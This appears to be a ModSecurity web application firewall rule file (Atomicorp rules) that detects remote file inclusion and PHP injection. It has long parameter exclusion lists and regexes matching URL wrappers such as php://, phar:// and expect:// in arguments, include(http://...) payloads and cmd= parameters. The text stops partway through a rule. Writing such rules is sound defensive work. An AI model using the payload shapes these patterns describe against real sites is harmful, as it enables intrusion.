SecRule ARGS|!ARGS:/^acf/|!ARGS:sld|!ARGS:carpeta|!ARGS:/wpforms/|!ARGS:imej|!ARGS:/saml/|!ARGS:/affwp/|!ARGS:/reason/|!ARGS:/container/|!ARGS:r|!ARGS:/^colissimo/|!ARGS:/refid/|!ARGS:/r3f5x9JS/|!ARGS:chl|!ARGS:/^tw247/|!ARGS:ujk|!ARGS:loc_db|!ARGS:/^woo/|!ARGS:pwd|!ARGS:/^objectTo/|!ARGS:1_1_8|!ARGS:/journal/|!ARGS:username|!ARGS:video|!ARGS:/website/|!ARGS:replace|!ARGS:/cdn/|!ARGS:/^xing/|!ARGS:ads|!ARGS:directories|!ARGS:/bookmark/|!ARGS:/case_name/|!ARGS:f_success|!ARGS:f_error|!ARGS:name|!ARGS:/userOption/|!ARGS:/brochure/|!ARGS:/target/|!ARGS:/^_d$/|!ARGS:klarna_order|!ARGS:/to$/|!ARGS:/schema/|!ARGS:protocol|!ARGS:str|!ARGS:/query/|!ARGS:/from/|!ARGS:/forward/|!ARGS:/^addon-/|!ARGS:/_script/|!ARGS:/graphic/|!ARGS:/virtuemart/|!ARGS:UF_VK|!ARGS:/powermail/|!ARGS:mp4|!ARGS:/confirmation/|!ARGS:/cloudflare/|!ARGS:/^ref_/|!ARGS:/hsw_ash/|!ARGS:/_online_/|!ARGS:/home/|!ARGS:installFull|!ARGS:b2w|!ARGS:/email/|!ARGS:term|!ARGS:/source_array/|!ARGS:/button/|!ARGS:/bestand/|!ARGS:/^request/|!ARGS:m_wb|!ARGS:/customfield/|!ARGS:/keyword/|!ARGS:embed|!ARGS:/cmsform/|!ARGS:/title/|!ARGS:social_network|!ARGS:scope|!ARGS:fb|!ARGS:/^vfb-/|!ARGS:to|!ARGS:pu|!ARGS:sima|!ARGS:/movie/|!ARGS:dns|!ARGS:contact_info|!ARGS:source_code|!ARGS:/_form/|!ARGS:listserv|!ARGS:p_zoho|!ARGS:sugarroot|!ARGS:cyswllt|!ARGS:/^attribute/|!ARGS:/^channel/|!ARGS:/^wdf_joodb/|!ARGS:/^replacer/|!ARGS:/^option/|!ARGS:/css_frame/|!ARGS:ad_code|!ARGS:tickets|!ARGS:war|!ARGS:slug|!ARGS:/whereto/|!ARGS:/search/|!ARGS:pack|!ARGS:origem|!ARGS:/extra_info/|!ARGS:str_sitio|!ARGS:post-id|!ARGS:xml|!ARGS:/metatags/|!ARGS:radio|!ARGS:shire|!ARGS:/^svc_id/|!ARGS:RelayState|!ARGS:ds_source|!ARGS:/^si_contact_/|!ARGS:next|!ARGS:clip|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:pattern_select|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^es-field/|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:junkWords|!ARGS:/foto/|!ARGS:/^attr_/|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/live$/|!ARGS:/tripadvisor/|!ARGS:/itune/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/^pass/|!ARGS:/password/|!ARGS:/note/|!ARGS:/form_/|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:application|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/media/|!ARGS:parent_name|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:importremote|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^akID/|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:/callback/|!ARGS:subject|!ARGS:/sponsors/|!ARGS:want2Read|!ARGS:direct|!ARGS:/thumb/|!ARGS:fflv|!ARGS:direct|!ARGS:source_location|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:wlp|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:sourcetitle|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:prodDownload|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:/banner/|!ARGS:heading|!ARGS:cl_post|!ARGS:/msg/|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:/host/|!ARGS:/text/|!ARGS:/Piwik/|!ARGS:admin_footer|!ARGS:showStr|!ARGS:/http/|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:/usps_label/|!ARGS:/story/|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:/^bbcode_/|!ARGS:/vimeo/|!ARGS:/link/|!ARGS:request_uri|!ARGS:/shopvk/|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:source|!ARGS:set_static_uri_to|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:revnews_ad_120|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:answer|!ARGS:intro|!ARGS:/about_us/|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:stories_cat|!ARGS:view|!ARGS:howhear|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:/signature/|!ARGS:disc|!ARGS:utmr|!ARGS:Query|!ARGS:steps|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:storage_path|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:/^wimpy/|!ARGS:/_ref/|!ARGS:/^pr_/|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:def|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:/GlobalFooter/|!ARGS:/^dynafield/|!ARGS:wysiwyg|!ARGS:banner|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:/license/|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/|!ARGS:github|!ARGS:linkedin|!ARGS:stack_overflow "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://(.*)$"  "phase:2,deny,log,auditlog,status:403,capture,id:340162,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:308,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection Attack detected (Unauthorized URL detected as argument)',logdata:'%{TX:0},%{matched_var_name}'"
SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
#SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"


#if its not encoded (which is why we dont use the transform), skip it as its already been reviewed in 340162
SecRule REQUEST_URI "=(?:ht|f)tps?://" "phase:2,id:333815,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"

# Rule 340165: Generic PHP code injection protection in URI w/ anti-evasion for encoded cases where ARGS doesnt work
SecRule REQUEST_URI "\://%{SERVER_NAME}/" "phase:2,id:333816,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"
SecRule REQUEST_URI "(?:(?:site|ur(?:l|i)\]?|s(?:earch|itemap|earch(?:text|key)|ubject|ervice|rc)|r(?:dfrom|equest)|utm_(?:source|term|c(?:tr|ontent))|owa_[a-z0-9]+|value|virtuemart|l(?:oc|ink)|off|war|youtube_id|k(?:eywords?|larna_order)|vid|next|snip?pet|feeds|name_ip|profile_id|details|go|r(?:esource|e(?:turn|f|pository|f?fer))|b(?:inary|vpage|ack|2w)|dns|media|page|hostname|filter[a-z]+|location|img|picture|path|\&u|destination|img_select|pattern_select|target|targetservice|web|referr?er|field-1|image|video|redirect|to|mp4|str|plugin_source|url_spam|chl|refid|r) ?= ?https?://|/\?(?:r(?:eturn|edirect)|redirect_to|br)=http|=https?://localhost/|^/site-content/|^/[a-z0-9\/\-]+/(?:new|edit)/[0-9]+/(?:confirm|edit)$|^/staff/index\.php\?_m=ticket|^/ar/l\?|^/index\.php\?(?:\&eid=powermaileidmarketing|route=checkout/checkout&edit&setting_id=[0-9]+&admin=http)|^/amember/admin-users/autocomplete?term=|^\?amoptimizer_bundle_check)" "phase:2,id:333817,rev:17,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_1"

SecRule REQUEST_URI "!(^/index\.php\?cmd=hbchat|^/wp-admin/admin\.php|cf/cf\.php|^/index\.php\?segment=pageurl|^/wp-admin/post-new\.php\?(calypsoify=[0-9]+)?&?(block-editor=[0-9]+)?&?frame-nonce=[0-9]+\:[0-9]+\:[a-f0-9]+&origin=http)" "chain,phase:2,deny,log,auditlog,status:403,capture,id:340165,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:292,severity:2,msg:'Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)',logdata:'%{MATCHED_VAR}'"
SecRule REQUEST_URI "=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)://" "t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase"

SecMarker END_INJECTION_RULES_1


#include injection attack
SecRule REQUEST_URI "^/admin/structure/block/manage" "phase:2,id:353896,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_340855"
##include(http://bad)
SecRule ARGS|!ARGS:filecontent|!ARGS:/gen_header/|!ARGS:/template/|!ARGS:/content/|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/message/ "include ?\(['\" ]?['\" ]?['\" ]? ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(ht|f)tps?):/" "phase:2,deny,log,auditlog,status:403,capture,id:340855,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Include Remote File Injection attempt in argument',logdata:'%{TX.0}'"
SecRule MATCHED_VAR "!(https?://%{SERVER_NAME}/)"

SecMarker END_INJECTION_RULES_340855

# Rule 340031: remote file inclusion generic attack signature
SecRule REQUEST_URI  "\.(?:dat|gif|jpe?g|png|bmp|txt|vir|dot)\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340031,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote file inclusion'"
SecRule REQUEST_URI|ARGS "(?:(?:pm_path|pagina|path|include_location|root|page|open)=(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)|(?:cmd|command|inc)=)"

SecMarker END_INJECTION_RULES

SecMarker END_INJECTION_RULES_ALL

#types that do not have RFI at all
SecRule TX:STATIC "@eq 1" "phase:2,id:'334818',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"

#additional types
SecRule TX:NONPHP "@eq 1" "phase:2,id:'333818',pass,t:none,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"

#File types that may have args, but can not be injected
SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:337819,rev:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"
#
#RFI/injection rules
SecRule ARGS|REQUEST_URI|!ARGS:SAMLResponse|!ARGS:templatecode|!ARGS:areas "@pm http:// https:// ftp:// ftps:// ogg:// tls://  zlib:// gopher:// compress.zlib" "phase:2,id:333819,t:none,t:replaceNulls,t:compressWhitespace,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334371,t:none,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"

# Rule 340038:
# Header anomaly for texture compression
SecRule REQUEST_HEADERS:Content-Encoding "Texture" "phase:1,log,auditlog,deny,status:501,msg:'Atomicorp.com WAF Rules: Header Anomaly (Texture)',id:340038"


SecRule REQUEST_METHOD "!(?:GET|POST)" "id:371112,phase:2,t:none,skipAfter:END_INJECTION_RULES_MULTI,nolog,noauditlog,pass"

# Rule 340163: Generic PHP code injection protection in URI w/ anti-evasion and multimatch
SecRule REQUEST_URI "(?:\/(?:(?:wp-admin\/(page|post|widgets|network/site-settings\.php|link|options|themes/basic/themify/img\.php\?src=|admin\.php?cf/cf\.php)|admin\/(?:edittemplate|webpage_update|theme-options|add_edit_)|(?:signup|cpinquiry|profile))\.php|p(?:(?:hpbb\/install\/install\.ph|l\/download\?file=htt)p|roxy\/cb_proxy\.\?a=http:\/\/)|i(?:ndex\.php\/admin\/system_config\/save\/section\/payment\/|mp\/compose\.php)|tiki-(?:objectpermissions|editpage|view_cache)|jomsocial\/[a-z]+\/(?:edit|add))|^(?:\/(?:(?:[a-z0-9\-]+\/events\?(?:utm_|trk_)|node\/[0-9]+\/(?:edit|add)|[a-z]+\/unsubscribe)|(?:mysqldumper\/dump|xmlrpc)\.php$|go\.php\?u=affilorama&t=http:\/\/|\.services\/sitelogout)|/(?:b/ss/mxmacromedia|horde/services/go|node/add|cas/))|(?:(?:jw_allvideos_player|mod_mp3player)\?(?:file|playlist)=htt|ubbthreads\/admin\/dofeatures\.ph)p|ad-?server\/adjs|\?mode=addshout|^/administrator/index\.php\?option=com_rsform|^/index\.php/profile/register/registerprofile|^/[a-z]+/edit|^/(?:admin/media|elements)/(?:s(?:ave|ettings?)|appearance)/|^/index\.php\?loginerror=incorrectpassword$|^/panel\?comd=nlwebform|^/cocms/index\.php\?s=|^/ls_javascript_combine/|^/index\.php\?option=com_rsform|^/killboard/\?a=admin_idfeedsyndication|^/api/users|^/numo/module/form_handler/|^/admin/add_edit_document|^/\?br=|^/app\.php/dl_ext/\?view=upload|^/index\.php\?option=com_uniform|^/\?_task=mail|^/index\.php\?p=admin/actions/elements/|^/?amoptimizer_bundle_check|^/\?wc-ajax|^/index\.php\?get=film&doaction=resultat)" "phase:2,id:333702,rev:6,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_INJECTION_RULES_MULTI"

SecRule ARGS|!ARGS:/^acf/|!ARGS:/^colissimo/|!ARGS:sld|!ARGS:carpeta|!ARGS:imej|!ARGS:/saml/|!ARGS:/affwp/|!ARGS:/search/|!ARGS:/containers/|!ARGS:r|!ARGS:/refid/|!ARGS:/r3f5x9JS/|!ARGS:chl|!ARGS:/^tw247/|!ARGS:ujk|!ARGS:_custom_|!ARGS:loc_db|!ARGS:/^woo/|!ARGS:/^replace/|!ARGS:pwd|!ARGS:/^objectTo/|!ARGS:1_1_8|!ARGS:/journal/|!ARGS:username|!ARGS:/website/|!ARGS:video|!ARGS:fb|!ARGS:/cdn/|!ARGS:/^xing/|!ARGS:directories|!ARGS:/bookmark/|!ARGS:/case_name/|!ARGS:f_success|!ARGS:f_error|!ARGS:/userOption/|!ARGS:name|!ARGS:/target/|!ARGS:/^_d$/|!ARGS:klarna_order|!ARGS:/to$/|!ARGS:/schema/|!ARGS:/brochure/|!ARGS:protocol|!ARGS:str|!ARGS:/query/|!ARGS:/from/|!ARGS:/forward/|!ARGS:/_script/|!ARGS:ads|!ARGS:/^addon-/|!ARGS:application|!ARGS:/graphic/|!ARGS:/virtuemart/|!ARGS:UF_VK|!ARGS:/powermail/|!ARGS:mp4|!ARGS:/confirmation/|!ARGS:/cloudflare/|!ARGS:/^ref_/|!ARGS:/hsw_ash/|!ARGS:/_online_/|!ARGS:/reason/|!ARGS:installFull|!ARGS:b2w|!ARGS:/^es-field/|!ARGS:term|!ARGS:/email/|!ARGS:/source_array/|!ARGS:/button/|!ARGS:/bestand/|!ARGS:/^request/|!ARGS:m_wb|!ARGS:/customfield/|!ARGS:/shopvk/|!ARGS:/keyword/|!ARGS:embed|!ARGS:/^cmsform/|!ARGS:social_network|!ARGS:scope|!ARGS:/^vfb-/|!ARGS:to|!ARGS:pu|!ARGS:/^meta/|!ARGS:sima|!ARGS:/movie/|!ARGS:dns|!ARGS:source_code|!ARGS:/_form/|!ARGS:listserv|!ARGS:p_zoho|!ARGS:sugarroot|!ARGS:cyswllt|!ARGS:/^attribute/|!ARGS:/^channel/|!ARGS:/^wdf_joodb/|!ARGS:options[alter][path]|!ARGS:/css_frame/|!ARGS:ad_code|!ARGS:tickets|!ARGS:war|!ARGS:slug|!ARGS:/whereto/|!ARGS:pack|!ARGS:/extra_info/|!ARGS:origem|!ARGS:str_sitio|!ARGS:post-id|!ARGS:/metatags/|!ARGS:xml|!ARGS:radio|!ARGS:shire|!ARGS:/^svc_id/|!ARGS:/live$/|!ARGS:RelayState|!ARGS:ds_source|!ARGS:/contact_/|!ARGS:next|!ARGS:clip|!ARGS:txt|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:pattern_select|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:/foto/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/^pass/|!ARGS:/password/|!ARGS:/note/|!ARGS:/form_/|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:/home/|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:/photo/|!ARGS:/media/|!ARGS:/icon/|!ARGS:back|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/twitter/|!ARGS:/flickr/|!ARGS:/youtube/|!ARGS:parent_name|!ARGS:/blog/|!ARGS:/vid/|!ARGS:_update_failure|!ARGS:_update_success|!ARGS:hdwok|!ARGS:hdwnook|!ARGS:OpenID|!ARGS:/^hilit/|!ARGS:/reciprocal/|!ARGS:importremote|!ARGS:/callback/|!ARGS:/sponsors/|!ARGS:/^akID/|!ARGS:want2Read|!ARGS:/thumb/|!ARGS:subject|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:/link/|!ARGS:/vimeo/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:/title/|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:confirm|!ARGS:/^groups/|!ARGS:prodDownload|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:/banner/|!ARGS:heading|!ARGS:cl_post|!ARGS:/msg/|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:/host/|!ARGS:/text/|!ARGS:/Piwik/|!ARGS:fetch|!ARGS:/pingback/|!ARGS:/http/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:var_value[usps_labels_help_2]|!ARGS:/story/|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:/^bbcode_/|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:GMAP_KEY|!ARGS:source|!ARGS:Infos|!ARGS:rev_you_tube|!ARGS:GMAP_KEY|!ARGS:newsBody|!ARGS:user_sig|!ARGS:cur|!ARGS:yahoo|!ARGS:sig|!ARGS:KT_Update1|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:sm_b_style|!ARGS:/^css/|!ARGS:introduction|!ARGS:register_at|!ARGS:revnews_ad_120|!ARGS:option[78]|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:/wpforms/|!ARGS:answer|!ARGS:intro|!ARGS:/about_us/|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:archive_chrono|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redir/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:oaparams|!ARGS:resource|!ARGS:/^wimpy/|!ARGS:/altTag/|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:stories_cat|!ARGS:view|!ARGS:howhear|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:/signature/|!ARGS:disc|!ARGS:storage_path|!ARGS:utmr|